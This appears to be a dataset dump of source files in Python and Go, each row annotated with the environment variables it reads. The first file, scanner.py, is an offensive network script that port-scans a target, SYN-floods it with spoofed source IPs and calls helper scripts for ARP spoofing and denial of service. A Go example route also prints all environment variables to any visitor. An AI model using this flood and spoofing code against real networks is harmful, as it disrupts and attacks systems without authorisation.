filename (stringlengths, 4-198) | content (stringlengths, 25-939k) | environment (list) | variablearg (list) | constarg (list) | variableargjson (stringclasses, 1 value) | constargjson (stringlengths, 2-3.9k) | lang (stringclasses, 3 values) | constargcount (float64, 0-129, ⌀) | variableargcount (float64, 0-0, ⌀) | sentence (stringclasses, 1 value) |
---|---|---|---|---|---|---|---|---|---|---|
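Each row below pairs a source file (`filename`, `content`, `lang`) with the environment variables it reads: `environment` appears to record the quoted literal arguments, `constarg`/`constargjson` the resolved constant names, `variablearg` names passed via variables, and the `*count` columns their totals. As a minimal sketch of how such a table could be consumed, assuming it corresponds to a Hugging Face-style dataset (the dataset id below is a hypothetical placeholder, not the real one):

```python
# Hedged sketch: load a dataset with the columns listed above and print rows
# that read at least one constant environment variable.
# NOTE: "user/env-var-usage" is a hypothetical placeholder id.
from datasets import load_dataset

ds = load_dataset("user/env-var-usage", split="train")
for row in ds:
    # constargcount may be missing (shown as "⌀" above), so guard against None
    if row["constargcount"] and row["constargcount"] > 0:
        print(row["filename"], row["lang"], row["constarg"])
```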
scanner.py
|
import re
import sys
import scapy.all as scapy
import os
import time as t
import socket
import colorama
import psutil
from colorama import Fore
from colorama import init
import datetime
import pyfiglet
from datetime import datetime
import subprocess
from os import system
from sys import stdout
init()
def oscheck(): # check the OS name, since this script (and the others it calls) is written primarily for Linux
t.sleep(1)
if sys.platform == 'linux':
print(Fore.GREEN+"Your system is compatible conitnuing to script ")
if sys.platform == 'win32':
print(Fore.RED+"Sorry your system doesnt seem to compatible but just might be")
A = str(input(" Would you like to continue anyway? n/Y ===> "))
if 'n' in A:
t.sleep(1)
os.system('cls')
print("Okay have a nice one!")
sys.exit()
elif 'Y' == A:
t.sleep(1)
print(" okay continuing! ")
t.sleep(1)
os.system('cls')
if sys.platform == 'win64':
print(Fore.RED+"Sorry your system doesnt seem to compatible but just might be")
A = str(input(" Would you like to continue anyway? n/Y ===> "))
if 'n' in A:
t.sleep(1)
os.system('cls')
print("Okay have a nice one!")
sys.exit()
elif 'Y' == A:
t.sleep(1)
print(" okay continuing! ")
t.sleep(1)
os.system('cls')
def linesep():
print(Fore.RED+"")
print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
def exit():
print("[!] Exiting [!] ")
sys.exit()
def checkinter():
wlan_pattern = re.compile("^wlan[0-9]+")
check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode())
# No wlan adapter (wlan0 or higher) is connected
if len(check_wifi_result) == 0:
print("Please connect a WiFi adapter and try again.")
exit()
def check():
if 'SUDO_UID' not in os.environ:
print("Try running this program with sudo.")
exit()
def CS(X): # variable X to combine clear and sleep
t.sleep(X)
os.system('clear')
def separator():
print(Fore.RED+"") # separation block for neatness
print("""
--------------------------------------
| |
| Arp scan completed |
|------------------------------------|
| |
| moving to Port Scan |
|------------------------------------|
""")
def emoji():
import emoji
print(emoji.emojize(":winking_face_with_tongue:"))
def bannerarp(): # banner for the ARP DoS and spoofing section
CS(2)
print(Fore.RED+"")
print("""
_______
| _ |.----..-----..--.--. ______ .-----..--.--.
| || _|| _ || | ||______|| _ || | |
|___|___||__| | __||___ | | __||___ |
|__| |_____| |__| |_____|
|-----|
|V-1.0| AHHHHH STEPPPP BROOOO \033[33m 😜
|-----| """,)
def banner():
CS(2)
print(Fore.RED+"")
print("""
.-----..----..---.-..-----. ______ .-----..--.--.
|__ --|| __|| _ || ||______|| _ || | |
|_____||____||___._||__|__| | __||___ |
|__| |_____|
____________
| V 1.0 |
|----------|
| Arp scan |
| discover |
| attack |
|----------|
-----------------------------------------------------
""")
def cpu_usage():
t.sleep(1)
print("------------------------------cpu usage las recorded while using this script -------------------------------------")
t.sleep(1)
print(" first im going to show the information about then the usage ")
print("Physical cores:", psutil.cpu_count(logical=False))
t.sleep(0.1)
print("Total Cores:", psutil.cpu_count(logical=True))
cpufreq = psutil.cpu_freq()
t.sleep(0.1)
print(f"Max Frequency: {cpufreq.max:.2f}Mhz")
t.sleep(0.1)
print(f"Min Frequency: {cpufreq.min:.2f}Mhz")
t.sleep(0.1)
print(f"CUrrent Frequency: {cpufreq.current:.2f}Mhz")
t.sleep(0.1)
print(" ------------------------------CPU USAGE OVER TIME OF THIS SCRIPT-------------------------------------------")
print("------------------------------------------------------------------------------------------------------------")
print("CPU Usage Per Core:")
for i, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)):
print(f"Core {i}: {percentage}%")
t.sleep(0.1)
print(f"Total CPU Usage: {psutil.cpu_percent()}%")
t.sleep(1.5)
def scan1():
ip_add_range_pattern = re.compile(r"^(?:[0-9]{1,3}\.){3}[0-9]{1,3}/[0-9]*$")
while True:
print(Fore.RED+"")
t.sleep(2)
print("----------------------------------------------------------------")
t.sleep(0.1)
print(" MAKE SURE ITS A RANGE (ex 192.168.1.0/24) ")
t.sleep(0.1)
print(" MAKE SURE YOU RAN THIS PROGRAM AS ROOT ")
t.sleep(0.1)
print(" MAKE SURE YOU ARE ON THE CURRENT NETWORK ")
t.sleep(0.1)
print(" MAKE SURE YOU HAVE PREMISSION TO DO THIS ")
t.sleep(0.1)
print("----------------------------------------------------------------")
ip_add_range_entered = input("\nIP range to send ARP requests to ==> ")
if ip_add_range_pattern.search(ip_add_range_entered):
print(f"{ip_add_range_entered} is a valid IP range")
break
print(Fore.GREEN+"")
arp_result = scapy.arping(ip_add_range_entered)
A = str(input(" Would you like to run extra scans? [y/N] ===> "))
linesep()
if 'N' in A:
t.sleep(1)
print("\n[*] Okay Continuing [*]")
if 'y' in A:
t.sleep(1)
os.system('sudo arp-scan -l -W scan.pcap')
os.system('tshark -r scan.pcap')
def interfacescan():
import psutil
from tabulate import tabulate
class InterfaceScanner(object):
def __init__(self):
self.instance = psutil.net_if_addrs()
def scanner(self):
self.interfaces = []
self.address_ip = []
self.netmask_ip = []
self.broadcast_ip = []
for interface_name, interface_addresses in self.instance.items():
self.interfaces.append(interface_name)
for address in interface_addresses:
if str(address.family) == 'AddressFamily.AF_INET':
self.address_ip.append(address.address)
self.netmask_ip.append(address.netmask)
self.broadcast_ip.append(address.broadcast)
data = {"Interface" : [*self.interfaces],
"IP-Address" : [*self.address_ip],
"Netmask" : [*self.netmask_ip],
"Broadcast-IP" : [*self.netmask_ip]
}
return tabulate(data, headers="keys", tablefmt="github")
def __str__(self):
return str(self.scanner())
if __name__ == "__main__":
print(Fore.BLUE+"")
print("---------------------You're interfaces--------------------------")
t.sleep(0.1)
print(InterfaceScanner())
def port_scan():
separator()
print(Fore.BLUE+"")
print(Fore.RED+"what IPA would you like to port scan ")
target = str(input("Target ====> "))
print("-"*80)
print('Please wait, scanning host', target, 'at date-time ==> ' + str(datetime.now()))
print("-"*80)
t1 = datetime.now()
try:
for port in range(1, 65536): # ports 1-65535; range() excludes the end value
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(1)
result = s.connect_ex((target,port))
if result == 0: # port is open; raw ANSI codes are used below because Fore.RED+ concatenation isn't available for a str with multiple brackets and variables
timescan = '[DATA] At ==>' + str(datetime.now())
print(timescan)
print("----------------------------------------------------------------------------------------------")
print("\033[35m Port ===> \033[36m [\033[35m {} \033[36m ] \033[35m Appears To Be Open".format(port))
print("----------------------------------------------------------------------------------------------")
s.close() # finally close the socket; after hours spent on the color formatting, it turned out that (like a missing ';' in Rust) forgetting this close messed the entire script up
except KeyboardInterrupt: # in the end it wasn't a semicolon at all, just a missing character (programmer rage)
linesep()
t.sleep(1)
print(" [!] EXITING [!]")
t.sleep(1)
except socket.gaierror:
print("\n [!]Hostname Could Not Be Resolved[!]")
sys.exit()
except socket.error:
t.sleep(1)
print("\n Server is not giving resposes[!]")
sys.exit()
except NameError:
os.system(' clear ')
t.sleep(1)
print(" [!] TARGET WAS NOT DEFINED ")
print(" [!] try a target like 127.0.0.1 ")
def arp1():
from random import randint # randint is used below for random source IPs and ports but was never imported
def randomIP():
ip = ".".join(map(str, (randint(0,255)for _ in range(4))))
return ip
def randInt():
x = randint(1000,9000)
return x
def TCP_Flood(dstIP,dstPort,counter):
total = 0
print ("ARPY Hammering ")
for x in range (0,counter):
s_port = randInt()
s_eq = randInt()
w_indow = randInt()
IP_Packet = scapy.IP() # use the scapy module imported at the top of the file
IP_Packet.src = randomIP()
IP_Packet.dst = dstIP
TCP_Packet = scapy.TCP() # the SYN-flood fields below (sport/dport/flags/seq/window) belong to a TCP layer, not ARP
TCP_Packet.sport = s_port
TCP_Packet.dport = dstPort
TCP_Packet.flags = "S"
TCP_Packet.seq = s_eq
TCP_Packet.window = w_indow
scapy.send(IP_Packet/TCP_Packet, verbose=0)
total+=1
stdout.write("\nTotal packets sent: %i\n" % total)
def info():
print("-----------------------------")
dstIP = input ("\nTarget IP ===> ")
print("-----------------------------")
dstPort = input ("Target Port ===> ")
return dstIP,int(dstPort)
def main():
dstIP,dstPort = info()
counter = input ("How many packets do you want to send : ")
TCP_Flood(dstIP,dstPort,int(counter))
main()
def UDP1():
print(Fore.MAGENTA+"")
os.system('sudo python A.py')
print(Fore.BLUE+"")
print(" ------------------------------------------------------------------------")
print(" [DATA] -- Denial of service stopped at ===> " + str(datetime.now()))
print(" ------------------------------------------------------------------------")
print(" I hope i was able to help, thanks for stopping by! have a nice one :D ")
def spoofie():
A = str(input(" Would you like to Arp-Spoof clients offline? [y/N]==> "))
if 'N' in A:
t.sleep(1)
print(" [*] this is the end of script i hope ")
print(" [*] this was able to help, goodbye! ")
elif 'y' == A:
t.sleep(1)
print(" [!] Clearning screen in ")
t.sleep(1)
print("1")
t.sleep(1)
print("2")
t.sleep(1)
print("3")
CS(2)
bannerarp()
print(" A == IP | B == website ")
arp = str(input(" is your host a website or a IP ==> "))
if 'A' in arp:
t.sleep(1)
print(" scanning the network again since terminal was cleared ")
CS(2)
check()
checkinter()
bannerarp()
linesep()
scan1()
interfacescan()
port_scan()
os.system('sudo python3 i.py')
if 'B' in arp:
t.sleep(1)
CS(2)
print(" Scanning again since terminal was cleared ")
check()
checkinter()
bannerarp()
linesep()
interfacescan()
port_scan()
UDP1()
if __name__ == '__main__':
oscheck()
t.sleep(1)
os.system('clear')
banner()
check()
checkinter()
interfacescan()
spoofie()
UDP1()
cpu_usage()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
cmd/ci-secret-generator/main.go
|
package main
import (
"bytes"
"errors"
"flag"
"fmt"
"io/ioutil"
"os"
"os/exec"
"reflect"
"strings"
"github.com/sirupsen/logrus"
utilerrors "k8s.io/apimachinery/pkg/util/errors"
"k8s.io/test-infra/prow/logrusutil"
"github.com/openshift/ci-tools/pkg/api/secretbootstrap"
"github.com/openshift/ci-tools/pkg/api/secretgenerator"
"github.com/openshift/ci-tools/pkg/secrets"
)
type options struct {
secrets secrets.CLIOptions
logLevel string
configPath string
bootstrapConfigPath string
outputFile string
dryRun bool
validate bool
validateOnly bool
maxConcurrency int
config secretgenerator.Config
bootstrapConfig secretbootstrap.Config
}
func parseOptions(censor *secrets.DynamicCensor) options {
var o options
fs := flag.NewFlagSet(os.Args[0], flag.ExitOnError)
fs.BoolVar(&o.dryRun, "dry-run", true, "Whether to actually create the secrets in vault.")
fs.StringVar(&o.configPath, "config", "", "Path to the config file to use for this tool.")
fs.StringVar(&o.bootstrapConfigPath, "bootstrap-config", "", "Path to the config file used for bootstrapping cluster secrets after using this tool.")
fs.BoolVar(&o.validate, "validate", true, "Validate that the items created from this tool are used in bootstrapping")
fs.BoolVar(&o.validateOnly, "validate-only", false, "If the tool should exit after the validation")
fs.StringVar(&o.outputFile, "output-file", "", "output file for dry-run mode")
fs.StringVar(&o.logLevel, "log-level", "info", fmt.Sprintf("Log level is one of %v.", logrus.AllLevels))
fs.IntVar(&o.maxConcurrency, "concurrency", 1, "Maximum number of concurrent in-flight goroutines to BitWarden.")
o.secrets.Bind(fs, os.Getenv, censor)
if err := fs.Parse(os.Args[1:]); err != nil {
logrus.WithError(err).Errorf("cannot parse args: %q", os.Args[1:])
}
return o
}
func (o *options) validateOptions() error {
level, err := logrus.ParseLevel(o.logLevel)
if err != nil {
return fmt.Errorf("invalid log level specified: %w", err)
}
logrus.SetLevel(level)
if !o.dryRun {
if err := o.secrets.Validate(); err != nil {
return err
}
}
if o.configPath == "" {
return errors.New("--config is empty")
}
if o.validate && o.bootstrapConfigPath == "" {
return errors.New("--bootstrap-config is required with --validate")
}
return nil
}
func (o *options) completeOptions(censor *secrets.DynamicCensor) error {
if err := o.secrets.Complete(censor); err != nil {
return err
}
var err error
o.config, err = secretgenerator.LoadConfigFromPath(o.configPath)
if err != nil {
return err
}
if o.bootstrapConfigPath != "" {
if err := secretbootstrap.LoadConfigFromFile(o.bootstrapConfigPath, &o.bootstrapConfig); err != nil {
return fmt.Errorf("couldn't load the bootstrap config: %w", err)
}
}
return o.validateConfig()
}
func cmdEmptyErr(itemIndex, entryIndex int, entry string) error {
return fmt.Errorf("config[%d].%s[%d]: empty field not allowed for cmd if name is specified", itemIndex, entry, entryIndex)
}
func (o *options) validateConfig() error {
for i, item := range o.config {
if item.ItemName == "" {
return fmt.Errorf("config[%d].itemName: empty key is not allowed", i)
}
for fieldIndex, field := range item.Fields {
if field.Name != "" && field.Cmd == "" {
return cmdEmptyErr(i, fieldIndex, "fields")
}
}
for paramName, params := range item.Params {
if len(params) == 0 {
return fmt.Errorf("at least one argument required for param: %s, itemName: %s", paramName, item.ItemName)
}
}
}
return nil
}
func executeCommand(command string) ([]byte, error) {
out, err := exec.Command("bash", "-o", "errexit", "-o", "nounset", "-o", "pipefail", "-c", command).CombinedOutput()
if err != nil {
return nil, fmt.Errorf("%s : %w", string(out), err)
}
if len(out) == 0 || len(bytes.TrimSpace(out)) == 0 {
return nil, fmt.Errorf("command %q returned no output", command)
}
if string(bytes.TrimSpace(out)) == "null" {
return nil, fmt.Errorf("command %s returned 'null' as output", command)
}
return out, nil
}
func updateSecrets(config secretgenerator.Config, client secrets.Client) error {
var errs []error
for _, item := range config {
logger := logrus.WithField("item", item.ItemName)
for _, field := range item.Fields {
logger = logger.WithFields(logrus.Fields{
"field": field.Name,
"command": field.Cmd,
})
logger.Info("processing field")
out, err := executeCommand(field.Cmd)
if err != nil {
msg := "failed to generate field"
logger.WithError(err).Error(msg)
errs = append(errs, errors.New(msg))
continue
}
if err := client.SetFieldOnItem(item.ItemName, field.Name, out); err != nil {
msg := "failed to upload field"
logger.WithError(err).Error(msg)
errs = append(errs, errors.New(msg))
continue
}
}
// Adding the notes-not-empty check here since we don't want to overwrite any notes that might already be present
// If notes have to be deleted, it would have to be a manual operation where the user goes to the bw web UI and removes
// the notes
if item.Notes != "" {
logger = logger.WithFields(logrus.Fields{
"notes": item.Notes,
})
logger.Info("adding notes")
if err := client.UpdateNotesOnItem(item.ItemName, item.Notes); err != nil {
msg := "failed to update notes"
logger.WithError(err).Error(msg)
errs = append(errs, errors.New(msg))
}
}
}
return utilerrors.NewAggregate(errs)
}
func main() {
logrusutil.ComponentInit()
censor := secrets.NewDynamicCensor()
logrus.SetFormatter(logrusutil.NewFormatterWithCensor(logrus.StandardLogger().Formatter, &censor))
o := parseOptions(&censor)
if err := o.validateOptions(); err != nil {
logrus.WithError(err).Fatal("invalid arguments.")
}
if err := o.completeOptions(&censor); err != nil {
logrus.WithError(err).Fatal("failed to complete options.")
}
itemContextsFromConfig := itemContextsFromConfig(o.config)
if o.validate {
if err := validateContexts(itemContextsFromConfig, o.bootstrapConfig); err != nil {
for _, err := range err.Errors() {
logrus.WithError(err).Error("Invalid entry")
}
logrus.Fatal("Failed to validate secret entries.")
}
}
if o.validateOnly {
logrus.Info("Validation succeeded and --validate-only is set, exiting")
return
}
if errs := generateSecrets(o, &censor); len(errs) > 0 {
logrus.WithError(utilerrors.NewAggregate(errs)).Fatal("Failed to update secrets.")
}
logrus.Info("Updated secrets.")
}
func generateSecrets(o options, censor *secrets.DynamicCensor) (errs []error) {
var client secrets.Client
if o.dryRun {
var err error
var f *os.File
if o.outputFile == "" {
f, err = ioutil.TempFile("", "ci-secret-generator")
if err != nil {
return append(errs, fmt.Errorf("failed to create tempfile: %w", err))
}
logrus.Infof("Writing secrets to %s", f.Name())
} else {
f, err = os.OpenFile(o.outputFile, os.O_CREATE|os.O_TRUNC|os.O_WRONLY, os.ModePerm)
if err != nil {
return append(errs, fmt.Errorf("failed to open output file %q: %w", o.outputFile, err))
}
}
client = secrets.NewDryRunClient(f)
} else {
var err error
client, err = o.secrets.NewClient(censor)
if err != nil {
return append(errs, fmt.Errorf("failed to create secrets client: %w", err))
}
}
if err := updateSecrets(o.config, client); err != nil {
errs = append(errs, fmt.Errorf("failed to update secrets: %w", err))
}
return errs
}
func itemContextsFromConfig(items secretgenerator.Config) []secretbootstrap.ItemContext {
var itemContexts []secretbootstrap.ItemContext
for _, item := range items {
for _, field := range item.Fields {
itemContexts = append(itemContexts, secretbootstrap.ItemContext{
Item: item.ItemName,
Field: field.Name,
})
}
}
return itemContexts
}
func validateContexts(contexts []secretbootstrap.ItemContext, config secretbootstrap.Config) utilerrors.Aggregate {
var errs []error
for _, needle := range contexts {
var found bool
for _, secret := range config.Secrets {
for _, haystack := range secret.From {
haystack.Item = strings.TrimPrefix(haystack.Item, config.VaultDPTPPrefix+"/")
if reflect.DeepEqual(needle, haystack) {
found = true
}
for _, dc := range haystack.DockerConfigJSONData {
ctx := secretbootstrap.ItemContext{
Item: strings.TrimPrefix(dc.Item, config.VaultDPTPPrefix+"/"),
Field: dc.AuthField,
}
if reflect.DeepEqual(needle, ctx) {
found = true
}
}
}
}
if !found {
errs = append(errs, fmt.Errorf("could not find context %v in bootstrap config", needle))
}
}
return utilerrors.NewAggregate(errs)
}
|
[] |
[] |
[] |
[]
|
[]
|
go
| 0 | 0 | |
web/manager.go
|
package web
import (
"github.com/draringi/SermonStation/audio"
"log"
"net/http"
_ "net/http/pprof"
"os"
)
const (
defaultBaseDir = "/usr/local/www/sermons/"
)
var baseDir string = os.Getenv("SERMON_BASEDIR")
var audioManager *audio.Manager
func StartServer(AudioManager *audio.Manager) {
if baseDir == "" {
baseDir = defaultBaseDir
}
router := getRouter()
audioManager = AudioManager
http.Handle("/api/", router)
go func() {
for {
log.Println(http.ListenAndServe(":8080", nil))
}
}()
}
|
[
"\"SERMON_BASEDIR\""
] |
[] |
[
"SERMON_BASEDIR"
] |
[]
|
["SERMON_BASEDIR"]
|
go
| 1 | 0 | |
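The row above illustrates the column mapping: `os.Getenv("SERMON_BASEDIR")` in the file yields `"SERMON_BASEDIR"` in `environment`, `SERMON_BASEDIR` in `constarg`/`constargjson`, and a `constargcount` of 1. Below is a rough, illustrative sketch of how such constant names could be pulled out of Go source; this is not the dataset's actual extraction pipeline, just a regex-based approximation:

```python
# Hedged sketch: recover constant env-var names passed to os.Getenv in Go source.
import json
import re

GETENV_RE = re.compile(r'os\.Getenv\(\s*"([^"]+)"\s*\)')

def const_env_vars(go_source: str) -> list:
    """Return the unique string-literal names passed to os.Getenv."""
    return sorted(set(GETENV_RE.findall(go_source)))

source = 'var baseDir string = os.Getenv("SERMON_BASEDIR")'
names = const_env_vars(source)
print(names)              # ['SERMON_BASEDIR']   -> constarg
print(json.dumps(names))  # ["SERMON_BASEDIR"]   -> constargjson
```

Names read through a variable (e.g. `os.Getenv(key)`) would not match this pattern; presumably those are what the `variablearg` columns capture.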
examples/golang-push/rideshare/main.go
|
package main
import (
"net/http"
"os"
"rideshare/bike"
"rideshare/car"
"rideshare/scooter"
"github.com/pyroscope-io/client/pyroscope"
)
func bikeRoute(w http.ResponseWriter, r *http.Request) {
bike.OrderBike(1)
w.Write([]byte("<h1>Bike ordered</h1>"))
}
func scooterRoute(w http.ResponseWriter, r *http.Request) {
scooter.OrderScooter(2)
w.Write([]byte("<h1>Scooter ordered</h1>"))
}
func carRoute(w http.ResponseWriter, r *http.Request) {
car.OrderCar(3)
w.Write([]byte("<h1>Car ordered</h1>"))
}
func index(w http.ResponseWriter, r *http.Request) {
result := "<h1>environment vars:</h1>"
for _, env := range os.Environ() {
result += env + "<br>"
}
w.Write([]byte(result))
}
func main() {
serverAddress := os.Getenv("PYROSCOPE_SERVER_ADDRESS")
if serverAddress == "" {
serverAddress = "http://localhost:4040"
}
pyroscope.Start(pyroscope.Config{
ApplicationName: "ride-sharing-app",
ServerAddress: serverAddress,
Logger: pyroscope.StandardLogger,
Tags: map[string]string{"region": os.Getenv("REGION")},
})
http.HandleFunc("/", index)
http.HandleFunc("/bike", bikeRoute)
http.HandleFunc("/scooter", scooterRoute)
http.HandleFunc("/car", carRoute)
err := http.ListenAndServe(":5000", nil)
if err != nil {
panic(err)
}
}
|
[
"\"PYROSCOPE_SERVER_ADDRESS\"",
"\"REGION\""
] |
[] |
[
"REGION",
"PYROSCOPE_SERVER_ADDRESS"
] |
[]
|
["REGION", "PYROSCOPE_SERVER_ADDRESS"]
|
go
| 2 | 0 | |
manifest/docker.go
|
package manifest
import (
"encoding/json"
"net/url"
"os"
"os/exec"
"strconv"
"strings"
)
var Docker = func(args ...string) *exec.Cmd {
return exec.Command("docker", args...)
}
func dockerHost() (host string) {
host = "127.0.0.1"
if h := os.Getenv("DOCKER_HOST"); h != "" {
u, err := url.Parse(h)
if err != nil {
return
}
parts := strings.Split(u.Host, ":")
host = parts[0]
}
return
}
func DockerHostExposedPorts() ([]int, error) {
open := []int{}
data, err := Docker("ps", "--format", "{{.ID}}").Output()
if err != nil {
return nil, err
}
for _, ps := range strings.Split(strings.TrimSpace(string(data)), "\n") {
if ps == "" {
continue
}
data, err := Docker("inspect", "--format", "{{json .NetworkSettings.Ports}}", ps).Output()
if err != nil {
return nil, err
}
var ports map[string][]struct {
HostPort string
}
err = json.Unmarshal(data, &ports)
if err != nil {
return nil, err
}
for _, port := range ports {
for _, m := range port {
p, err := strconv.Atoi(m.HostPort)
if err != nil {
return nil, err
}
open = append(open, p)
}
}
}
return open, nil
}
|
[
"\"DOCKER_HOST\""
] |
[] |
[
"DOCKER_HOST"
] |
[]
|
["DOCKER_HOST"]
|
go
| 1 | 0 | |
test/e2e_flags.go
|
/*
Copyright 2018 The Knative Authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// This file contains logic to encapsulate flags which are needed to specify
// what cluster, etc. to use for e2e tests.
package test
import (
"flag"
"fmt"
"os"
"path"
pkgTest "github.com/knative/pkg/test"
"github.com/knative/pkg/test/logging"
)
// EventingFlags holds the command line flags specific to knative/eventing
var EventingFlags = initializeEventingFlags()
// EventingEnvironmentFlags holds the e2e flags needed only by the eventing repo
type EventingEnvironmentFlags struct {
DockerRepo string // Docker repo (defaults to $DOCKER_REPO_OVERRIDE)
Tag string // Tag for test images
Provisioner string // The name of the Channel's ClusterChannelProvisioner
}
func initializeEventingFlags() *EventingEnvironmentFlags {
var f EventingEnvironmentFlags
repo := os.Getenv("DOCKER_REPO_OVERRIDE")
if repo == "" {
repo = os.Getenv("KO_DOCKER_REPO")
}
defaultRepo := path.Join(repo, "github.com/knative/eventing/test/test_images")
flag.StringVar(&f.DockerRepo, "dockerrepo", defaultRepo,
"Provide the uri of the docker repo you have uploaded the test image to using `uploadtestimage.sh`. Defaults to $DOCKER_REPO_OVERRIDE")
flag.StringVar(&f.Tag, "tag", "e2e", "Provide the version tag for the test images.")
flag.StringVar(&f.Provisioner, "clusterChannelProvisioner", "in-memory-channel", "The name of the Channel's clusterChannelProvisioner. Only the in-memory-channel is installed by the tests, anything else must be installed before the tests are run.")
flag.Parse()
logging.InitializeLogger(pkgTest.Flags.LogVerbose)
if pkgTest.Flags.EmitMetrics {
logging.InitializeMetricExporter()
}
return &f
}
// ImagePath returns an image path using the configured image repo and tag.
func ImagePath(name string) string {
return fmt.Sprintf("%s/%s:%s", EventingFlags.DockerRepo, name, EventingFlags.Tag)
}
|
[
"\"DOCKER_REPO_OVERRIDE\"",
"\"KO_DOCKER_REPO\""
] |
[] |
[
"DOCKER_REPO_OVERRIDE",
"KO_DOCKER_REPO"
] |
[]
|
["DOCKER_REPO_OVERRIDE", "KO_DOCKER_REPO"]
|
go
| 2 | 0 | |
test/functional/test_runner.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
Functional tests are disabled on Windows by default. Use --force to run them anyway.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:oasisTestFramework.main`.
"""
import argparse
from collections import deque
import configparser
import datetime
import os
import time
import shutil
import signal
import sys
import subprocess
import tempfile
import re
import logging
# Formatting. Default colors to empty strings.
BOLD, BLUE, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name == 'posix':
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
BLUE = ('\033[0m', '\033[0;34m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
BASE_SCRIPTS= [
# Scripts that are run by the travis build process.
# Longest test should go first, to favor running tests in parallel
'wallet_basic.py', # ~ 1155 sec
'wallet_backup.py', # ~ 459 sec
'mining_pos_reorg.py', # ~ 305 sec
# vv Tests less than 5m vv
'mining_pos_coldStaking.py', # ~ 289 sec
'wallet_zerocoin_publicspends.py', # ~ 270 sec
'p2p_time_offset.py', # ~ 263 sec
'wallet_abandonconflict.py', # ~ 208 sec
'rpc_rawtransaction.py', # ~ 190 sec
'wallet_zapwallettxes.py', # ~ 172 sec
'wallet_keypool_topup.py', # ~ 167 sec
'wallet_txn_doublespend.py --mineblock', # ~ 157 sec
'wallet_txn_clone.py --mineblock', # ~ 157 sec
'interface_rest.py', # ~ 154 sec
'rpc_spork.py', # ~ 149 sec
'feature_proxy.py', # ~ 143 sec
'feature_uacomment.py', # ~ 130 sec
'mining_pos_fakestake.py', # ~ 123 sec
'wallet_import_stakingaddress.py', # ~ 123 sec
# vv Tests less than 2m vv
'p2p_disconnect_ban.py', # ~ 118 sec
'wallet_listreceivedby.py', # ~ 117 sec
'feature_reindex.py', # ~ 110 sec
'interface_http.py', # ~ 105 sec
'rpc_listtransactions.py', # ~ 97 sec
'mempool_reorg.py', # ~ 92 sec
'wallet_encryption.py', # ~ 89 sec
'wallet_keypool.py', # ~ 88 sec
'wallet_dump.py', # ~ 83 sec
'rpc_net.py', # ~ 83 sec
'rpc_bip38.py', # ~ 82 sec
'interface_bitcoin_cli.py', # ~ 80 sec
# vv Tests less than 60s vv
'wallet_accounts.py', # ~ 55 sec
'mempool_resurrect.py', # ~ 51 sec
'rpc_budget.py', # ~ 50 sec
'mempool_spend_coinbase.py', # ~ 50 sec
'rpc_signrawtransaction.py', # ~ 50 sec
'rpc_decodescript.py', # ~ 50 sec
'rpc_blockchain.py', # ~ 50 sec
'wallet_disable.py', # ~ 50 sec
'rpc_signmessage.py', # ~ 50 sec
'feature_help.py', # ~ 30 sec
# Don't append tests at the end to avoid merge conflicts
# Put them in a random line within the section that fits their approximate run-time
# 'feature_block.py',
# 'rpc_fundrawtransaction.py',
# 'wallet_importmulti.py',
# 'mempool_limit.py', # We currently don't limit our mempool_reorg
# 'interface_zmq.py',
# 'rpc_getchaintips.py',
# 'mempool_persist.py',
# 'rpc_users.py',
# 'rpc_deprecated.py',
# 'p2p_mempool.py',
# 'mining_prioritisetransaction.py',
# 'p2p_invalid_block.py',
# 'p2p_invalid_tx.py',
# 'wallet_import_rescan.py',
# 'mining_basic.py',
# 'wallet_bumpfee.py',
# 'wallet_listsinceblock.py',
# 'p2p_leak.py',
# 'feature_cltv.py',
# 'wallet_resendwallettransactions.py',
# 'feature_minchainwork.py',
# 'p2p_fingerprint.py',
# 'p2p_unrequested_blocks.py',
# 'feature_config_args.py',
]
EXTENDED_SCRIPTS = [
# These tests are not run by the travis build process.
# Longest test should go first, to favor running tests in parallel
# vv Tests less than 20m vv
#'feature_fee_estimation.py',
# vv Tests less than 5m vv
# vv Tests less than 2m vv
#'p2p_timeouts.py',
# vv Tests less than 60s vv
#'p2p_feefilter.py',
'rpc_bind.py',
# vv Tests less than 30s vv
#'example_test.py',
'feature_notifications.py',
'rpc_invalidateblock.py',
]
# Place EXTENDED_SCRIPTS first since it has the 3 longest running tests
ALL_SCRIPTS = EXTENDED_SCRIPTS + BASE_SCRIPTS
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
def main():
# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--combinedlogslen', '-c', type=int, default=0, help='print a combined log (of length n lines) from all test nodes and test framework to the console on failure.')
parser.add_argument('--coverage', action='store_true', help='generate a basic coverage report for the RPC interface')
